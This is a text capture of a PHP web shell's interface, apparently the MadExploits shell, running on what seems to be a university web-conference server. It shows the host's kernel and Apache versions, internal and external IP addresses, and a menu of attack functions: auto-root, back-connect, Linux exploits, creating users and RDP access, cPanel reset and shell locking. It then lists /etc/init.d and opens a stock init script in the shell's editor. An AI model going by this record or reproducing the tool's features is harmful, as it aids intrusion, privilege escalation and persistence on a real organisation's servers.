Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.219.127.59
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
init.d /
[ HOME SHELL ]
Name
Size
Permission
Action
apache-htcacheclean
2.43
KB
-rwxr-xr-x
apache2
7.99
KB
-rwxr-xr-x
apparmor
3.65
KB
-rwxr-xr-x
apport
2.85
KB
-rwxr-xr-x
atd
1.05
KB
-rwxr-xr-x
console-setup.sh
1.2
KB
-rwxr-xr-x
cron
2.99
KB
-rwxr-xr-x
cryptdisks
937
B
-rwxr-xr-x
cryptdisks-early
896
B
-rwxr-xr-x
dbus
3.08
KB
-rwxr-xr-x
grub-common
985
B
-rwxr-xr-x
hwclock.sh
3.72
KB
-rwxr-xr-x
irqbalance
2.58
KB
-rwxr-xr-x
iscsid
1.47
KB
-rwxr-xr-x
keyboard-setup.sh
1.44
KB
-rwxr-xr-x
kmod
2
KB
-rwxr-xr-x
lvm2
695
B
-rwxr-xr-x
lvm2-lvmpolld
586
B
-rwxr-xr-x
multipath-tools
2.76
KB
-rwxr-xr-x
mysql
5.48
KB
-rwxr-xr-x
nfs-common
5.53
KB
-rwxr-xr-x
open-iscsi
2.44
KB
-rwxr-xr-x
open-vm-tools
1.8
KB
-rwxr-xr-x
plymouth
1.33
KB
-rwxr-xr-x
plymouth-log
752
B
-rwxr-xr-x
procps
924
B
-rwxr-xr-x
rpcbind
2.45
KB
-rwxr-xr-x
rsync
4.31
KB
-rwxr-xr-x
rsyslog
2.8
KB
-rwxr-xr-x
screen-cleanup
1.19
KB
-rwxr-xr-x
ssh
3.85
KB
-rwxr-xr-x
udev
6.71
KB
-rwxr-xr-x
ufw
2.03
KB
-rwxr-xr-x
unattended-upgrades
1.36
KB
-rwxr-xr-x
uuidd
1.28
KB
-rwxr-xr-x
wazuh-agent
919
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : screen-cleanup
#!/bin/sh # $Id: init,v 1.3 2004/03/16 01:43:45 zal Exp $ # # Script to remove stale screen named pipes on bootup. # ### BEGIN INIT INFO # Provides: screen-cleanup # Required-Start: $remote_fs # Required-Stop: $remote_fs # Default-Start: S # Default-Stop: # Short-Description: screen sessions cleaning # Description: Cleans up the screen session directory and fixes its # permissions if needed. ### END INIT INFO set -e test -f /usr/bin/screen || exit 0 SCREENDIR=/run/screen case "$1" in start) if test -L $SCREENDIR || ! test -d $SCREENDIR; then rm -f $SCREENDIR mkdir $SCREENDIR chown root:utmp $SCREENDIR [ -x /sbin/restorecon ] && /sbin/restorecon $SCREENDIR fi find $SCREENDIR -type p -delete # If the local admin has used dpkg-statoverride to install the screen # binary with different set[ug]id bits, change the permissions of # $SCREENDIR accordingly BINARYPERM=`stat -c%a /usr/bin/screen` if [ "$BINARYPERM" -ge 4000 ]; then chmod 0755 $SCREENDIR elif [ "$BINARYPERM" -ge 2000 ]; then chmod 0775 $SCREENDIR else chmod 1777 $SCREENDIR fi ;; stop|restart|reload|force-reload) ;; esac exit 0
Close